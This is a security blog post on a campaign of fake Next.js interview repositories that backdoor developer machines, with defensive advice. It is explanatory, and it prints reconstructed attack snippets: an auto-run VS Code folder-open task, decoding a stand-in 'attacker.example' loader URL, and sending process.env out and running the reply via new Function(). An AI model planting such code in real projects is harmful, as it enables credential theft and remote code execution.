The API Guys

Fake Next.js Job Tests Are Backdooring Developer Devices

Security · Next.js · Supply Chain · Developer Security

If you have been through a technical interview recently, you have almost certainly been handed a repository to clone and run. It is standard practice: the hiring company shares a codebase, you work through a coding challenge, and everyone treats the workflow as routine. That routine is now an active attack surface.

Microsoft Defender researchers have published an analysis of a coordinated campaign targeting software developers through malicious repositories disguised as legitimate Next.js projects and technical assessment materials. The attacker's goal is remote code execution on developer machines, data exfiltration, and the installation of additional payloads. The attack activates automatically during your normal development workflow, before you have written a single line of code.

How It Works

The attacker creates fake web application projects built with Next.js and distributes them as coding projects during job interviews or technical assessments. Researchers initially identified a repository hosted on Bitbucket, but discovered multiple repositories sharing code structure, loader logic, and naming patterns, indicating a coordinated operation rather than an isolated incident.

When a developer clones the repository and opens it locally, following what appears to be a perfectly normal workflow, malicious JavaScript executes automatically. The script downloads a JavaScript backdoor from the attacker's server and runs it directly in memory within the Node.js process. The result is remote code execution on the developer's machine.

What makes this campaign particularly effective is the number of execution triggers embedded in the repository. Microsoft identified three separate mechanisms, any one of which is sufficient to compromise the target.

Three Ways to Get Compromised Before You Start

The VS Code trigger. The repository contains a .vscode/tasks.json file configured with runOn: "folderOpen". In VS Code, this setting executes a Node script automatically as soon as you open the project folder and mark it as trusted. The word "trusted" carries particular weight here: VS Code's Workspace Trust feature is designed to let users mark a folder safe before running tasks. If you open the project folder and click "Yes, I trust the authors," execution happens immediately.
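To make the mechanism concrete, here is what such a task definition can look like. This is a hypothetical reconstruction, not the file from the actual campaign: the label and script path are invented, but `runOptions.runOn: "folderOpen"` is the real VS Code setting that fires the task the moment a trusted folder opens.

```json
{
  "version": "2.0.0",
  "tasks": [
    {
      // An innocuous-looking label is part of the disguise.
      "label": "Prepare workspace",
      "type": "shell",
      "command": "node .vscode/bootstrap.js",
      "runOptions": {
        // Runs automatically when the folder is opened and trusted —
        // no build, no dev server, no click required.
        "runOn": "folderOpen"
      }
    }
  ]
}
```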

The dev server trigger. When you run npm run dev, a trojanised asset (a modified JavaScript library within the project) decodes a hidden URL, fetches a loader from a remote server, and executes it in memory. This trigger fires during what every Next.js developer does as the first step: starting the development server.
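The decode-and-fetch pattern can be sketched in a few lines. This is an illustrative reconstruction, not the actual malware: the URL is a stand-in, and the real campaign's obfuscation may differ, but the mechanism (an innocuous-looking base64 blob inside a vendor asset, decoded at dev-server startup) is the one described.

```javascript
// Stand-in for the attacker's loader URL; the real one is unknown.
const hiddenUrl = "https://attacker.example/loader.js";

// As it would sit inside the trojanised asset: a meaningless-looking blob
// that blends into minified vendor code.
const blob = Buffer.from(hiddenUrl).toString("base64");

// What the malicious code does when `npm run dev` runs:
const decoded = Buffer.from(blob, "base64").toString("utf8");
// ...followed by fetching `decoded` and executing the response body in
// memory, so nothing malicious is ever written to disk.
console.log(decoded);
```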

The backend startup trigger. When the backend module starts, it decodes a base64-encoded endpoint from the .env file, sends the entire contents of process.env to the attacker's server, receives JavaScript in response, and executes it using new Function(). This is particularly destructive because process.env contains everything in your local environment: API keys, tokens, database URLs, service credentials stored for convenience during local development.
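The three steps of this trigger can be sketched as follows. Again, this is an illustrative reconstruction under stated assumptions: the endpoint, variable names, and server reply are invented stand-ins, and the network call is simulated, but the decode, serialise, and `new Function()` mechanism is the one Microsoft describes.

```javascript
// Stand-in for the base64 value hidden in the project's .env file.
const encodedEndpoint = Buffer.from("https://attacker.example/collect")
  .toString("base64");

// Step 1: decode the hidden C2 endpoint.
const endpoint = Buffer.from(encodedEndpoint, "base64").toString("utf8");

// Step 2: serialise the entire environment — every key, token, and
// connection string your shell and .env expose to the process.
const payload = JSON.stringify(process.env);

// Step 3: whatever the server returns is compiled and run in memory.
// Simulated reply standing in for attacker-supplied code:
const reply = "return 'attacker code ran';";
const result = new Function(reply)();
```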

What Happens After Infection

The initial payload (Stage 1) profiles the compromised machine and registers it with a command-and-control endpoint, polling the server at fixed intervals for instructions.

If the attacker chooses to proceed, Stage 2 delivers a tasking controller that connects to a separate C2 server, checks for tasks, executes supplied JavaScript in memory, and tracks spawned processes. The payload also supports file enumeration, directory browsing, and staged file exfiltration.

The result is full remote access to the developer's machine for as long as the attacker maintains it, with no indication to the developer that anything unusual has occurred.

Why Developers Are the Target

Developer machines are unusually valuable targets. They typically hold credentials for cloud platforms, access tokens for source code repositories, private keys, database connection strings for staging and sometimes production environments, and SSH keys that may reach internal infrastructure. A compromised developer laptop is frequently a direct path into the company the developer works for.

The job interview context makes this attack particularly clever. Candidates are naturally cautious about the companies they apply to, but they rarely apply the same scrutiny to the technical materials those companies send them. Cloning and running a project feels like normal, professional behaviour. The social engineering cost is nearly zero.

This follows a broader pattern of attackers targeting developer workflows rather than end users. We covered a related campaign last year in our post on supply chain attacks via npm packages. In both cases, the attack surface is the developer's own tools and habits.

Mitigations Worth Implementing Now

Microsoft recommends the following in their report. We have added context where relevant.

Use VS Code Workspace Trust properly. Workspace Trust exists for exactly this scenario. When you open a project from an unfamiliar source, choose Restricted Mode rather than granting full trust. In Restricted Mode, tasks.json files and other workspace-level automation are disabled until you explicitly enable them. This neutralises the first trigger entirely.
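If you want this enforced rather than remembered, VS Code exposes Workspace Trust behaviour in user settings. The snippet below is a suggested baseline, not the only valid configuration; the setting names are VS Code's own.

```json
{
  // Keep Workspace Trust enabled (it is the default, but make it explicit).
  "security.workspace.trust.enabled": true,
  // Always prompt on startup rather than silently reusing a trust decision.
  "security.workspace.trust.startupPrompt": "always",
  // Open files from untrusted locations in a separate restricted window.
  "security.workspace.trust.untrustedFiles": "newWindow"
}
```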

Review .vscode/tasks.json before trusting any project. If a repository from an unfamiliar source contains tasks configured to run on folder open, that is unusual. Legitimate assessment projects almost never need this. Treat it as a red flag.

Minimise secrets on developer endpoints. Long-lived API keys and tokens stored in local .env files represent significant exposure. Where possible, use short-lived tokens with the least required privileges. If your development workflow can tolerate it, consider using tools like Doppler or similar to avoid storing sensitive credentials directly on disk.

Audit what is in your process.env. The backend trigger exfiltrates your entire environment on startup. Run through what your local .env files contain and consider which credentials would be damaging if leaked. Any credential that provides access beyond the local development context is a priority for rotation to short-lived alternatives.
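A quick way to see what that exfiltration would capture is to list the environment variable names that look like credentials. The keyword list below is an assumption — extend it for your own stack:

```javascript
// Names matching these keywords are worth reviewing first; the list is a
// starting point, not an exhaustive definition of "sensitive".
const RISKY = /(KEY|TOKEN|SECRET|PASSWORD|DATABASE_URL|CREDENTIAL)/i;

function riskyEnvNames(env) {
  return Object.keys(env)
    .filter((name) => RISKY.test(name))
    .sort();
}

// Print only the names, never the values.
console.log(riskyEnvNames(process.env));
```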

Be sceptical of repositories from technical assessments. This is a hard cultural shift in an industry that has normalised sharing code freely, but if you receive a repository as part of a hiring process, take a moment to review its structure before running it. Check for .vscode/tasks.json, unusual dependencies in package.json, and modified or obfuscated library files before starting the dev server.

Enable Attack Surface Reduction rules on Windows. Microsoft's ASR rules can block a number of the behaviours this malware relies on, including execution of JavaScript from unusual process chains. If your development environment runs on Windows, these are worth enabling.

A Note on Trust

The software development industry runs on an enormous amount of implicit trust: trust in packages pulled from npm, trust in code shared via GitHub, trust in the assessment materials sent over by a recruiter. That trust is legitimate and necessary. The open source ecosystem would not function without it.

But implicit trust should have limits, and those limits should be enforced by tooling rather than by hoping developers remember to be cautious. VS Code's Workspace Trust feature is there precisely because running arbitrary code on open is a risk. Using it properly costs almost nothing and eliminates a real attack vector.

If you are a developer who handles technical assessments for your company and you want to discuss what a secure developer onboarding or assessment setup looks like, get in touch.
